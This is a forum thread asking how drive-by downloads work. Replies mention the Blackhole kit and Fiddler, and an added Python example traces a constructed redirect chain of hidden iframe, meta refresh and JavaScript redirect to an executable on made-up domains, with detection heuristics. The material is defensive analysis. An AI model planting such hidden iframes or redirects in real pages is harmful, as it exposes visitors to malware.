Full understanding specific "Drive-by download" behavior

ansar313

New Member
Thread author
May 20, 2013
Hello to all,
I have little skill in English writing. Excuse me :)
I am trying to understand a specific malware behaviour that is used by "drive-by downloads",
especially these questions:
1. What file is downloaded in the attack?
2. What exploit is used in the attack?
3. What domain is redirected to, etc.
For example, the BLADE evaluation lab lists some malware URLs that use drive-by downloads.
http://www.blade-defender.org/eval-lab/
I want to understand the exact attack scenario, step by step, for each URL listed in BLADE.

Notice: there are many websites that make reports with full detail, but they don't describe the mechanism. Please help me!
 
RE: full understanding specific Drive-by download behavior

Here is how a drive-by download and exploit work to infect internet users:

The Blackhole Exploit Kit

iFrame drive-by attack demo: http://www.youtube.com/watch?&v=_cBed6-ufIQ
Adobe Reader vulnerability demo
 
RE: full understanding specific Drive-by download behavior

Dear Jack,
thanks a lot,
but my question is something else:
is there software or a website that we can give a malware URL, and it gives us a report that describes the attack scenario step by step?
Please help me.
 
I believe a drive-by download relies on vulnerabilities where the targeted software has an unpatched/open exploit, i.e. IE6, an older Flash Player or Java (plus much other software), and a specially crafted web page takes advantage of it, without user interaction.

Other forms could use social engineering, by tricking the user into downloading files and luring them into executing them (i.e. double extension).

However, modern browsers today provide anti-phishing/malware protection, and keeping your plugins updated helps keep your PC secure against the latest attacks.

PS: Correct me if I'm wrong.
 
The files downloaded are first temp files, which are likely legitimate; these then drop others until an executable appears.

Using a program like Fiddler, you can monitor the modifications in that type of attack.
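The mechanism the replies above describe (a compromised page that quietly loads an exploit-kit landing page, which redirects again until an executable comes down, visible hop by hop in a proxy such as Fiddler) is easier to see in code. The script below is an added example written for this thread; it is not code from any poster, from BLADE or from the Blackhole kit. It walks a small constructed set of pages (the domains compromised.example, redirector.example and kit.example and every page body are made up for the example) and reports each hop, the vector that produced it (hidden iframe, meta refresh or JavaScript location assignment) and whether the final response starts with the "MZ" executable header, which is one way to answer questions 1 to 3 for a captured chain. fake_fetch is a stand-in for reading responses out of your own proxy capture.

```python
"""Trace a drive-by redirect chain across a set of captured pages (added example)."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed stand-in for captured traffic: URL -> (Content-Type, body).
# Every domain and page here is made up; nothing points at a real site.
PAGES = {
    "http://compromised.example/index.html": ("text/html", b"""<html><body>
<h1>Welcome</h1>
<iframe src="http://redirector.example/go.php" width="1" height="1"
        style="visibility:hidden"></iframe>
</body></html>"""),
    "http://redirector.example/go.php": ("text/html", b"""<html><head>
<meta http-equiv="refresh" content="0;url=http://kit.example/landing.php">
</head></html>"""),
    "http://kit.example/landing.php": ("text/html", b"""<html><body>
<script>window.location = "http://kit.example/payload.exe";</script>
</body></html>"""),
    # A PE file starts with the 'MZ' magic; the rest is padding.
    "http://kit.example/payload.exe": ("application/octet-stream", b"MZ\x90\x00" + b"\x00" * 60),
}

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
META_REFRESH_RE = re.compile(r"""<meta\b[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*>""", re.I)
# window.location = "...", location.href = "...", document.location = "..."
JS_REDIRECT_RE = re.compile(
    r"""(?:window\.|document\.|self\.|top\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I)
# Which vector to follow first when a page offers several.
PRIORITY = {"hidden-iframe": 0, "meta-refresh": 1, "js-redirect": 2, "iframe": 3}


def _attrs(tag_body):
    """Parse name="value" pairs out of a tag body into a lower-cased dict."""
    out = {}
    for m in ATTR_RE.finditer(tag_body):
        out[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return out


def _is_hidden(attrs):
    """Heuristic for the classic injected iframe: invisible, 1x1 or off-screen."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style or re.search(r"(left|top):-\d", style):
        return True
    try:
        w = int(attrs.get("width", "100").rstrip("px"))
        h = int(attrs.get("height", "100").rstrip("px"))
    except ValueError:
        return False
    return w <= 1 or h <= 1


def next_hops(html):
    """Return (vector, url) for every redirect vector found in an HTML body."""
    hops = []
    for m in IFRAME_RE.finditer(html):
        a = _attrs(m.group(1))
        if "src" in a:
            hops.append(("hidden-iframe" if _is_hidden(a) else "iframe", a["src"]))
    for m in META_REFRESH_RE.finditer(html):
        u = re.search(r"""url\s*=\s*['"]?([^'"\s]+)""", _attrs(m.group(0)).get("content", ""), re.I)
        if u:
            hops.append(("meta-refresh", u.group(1)))
    for m in JS_REDIRECT_RE.finditer(html):
        hops.append(("js-redirect", m.group(1)))
    return hops


@dataclass
class Hop:
    url: str
    via: str           # the vector that led here ("start" for the first page)
    content_type: str
    executable: bool   # body begins with the PE 'MZ' magic


def fake_fetch(url):
    """Stand-in for reading a response from a proxy capture; unknown URLs are empty."""
    return PAGES.get(url, ("text/plain", b""))


def trace_chain(start, fetch=fake_fetch, max_hops=10):
    """Follow the highest-priority vector on each page until a payload or a dead end."""
    chain, seen, url, via = [], set(), start, "start"
    while url not in seen and len(chain) < max_hops:   # 'seen' stops redirect loops
        seen.add(url)
        ctype, body = fetch(url)
        hop = Hop(url, via, ctype, body.startswith(b"MZ"))
        chain.append(hop)
        if hop.executable or not ctype.startswith("text/html"):
            break                                       # payload reached, or nothing to parse
        hops = next_hops(body.decode("utf-8", "replace"))
        if not hops:
            break
        via, url = min(hops, key=lambda h: PRIORITY[h[0]])
    return chain


def domains(chain):
    """Distinct hosts in the order they were contacted (question 3 in the thread)."""
    out = []
    for hop in chain:
        host = urlparse(hop.url).netloc
        if host not in out:
            out.append(host)
    return out


if __name__ == "__main__":
    chain = trace_chain("http://compromised.example/index.html")
    for hop in chain:
        flag = "  <-- executable" if hop.executable else ""
        print(f"{hop.via:14} {hop.url}  [{hop.content_type}]{flag}")
    print("domains involved:", domains(chain))
```

Two caveats for anyone adapting this: the hidden-iframe test is a heuristic (1x1 frames are also used by legitimate trackers, and real kits obfuscate the JavaScript stage so a plain regex will not find the location assignment), and the input should be a saved proxy capture, not a live fetch of malware URLs from a workstation. The MZ check only identifies a Windows executable; the exploit itself (question 2) sits in the landing page and usually has to be deobfuscated by hand or in a sandbox.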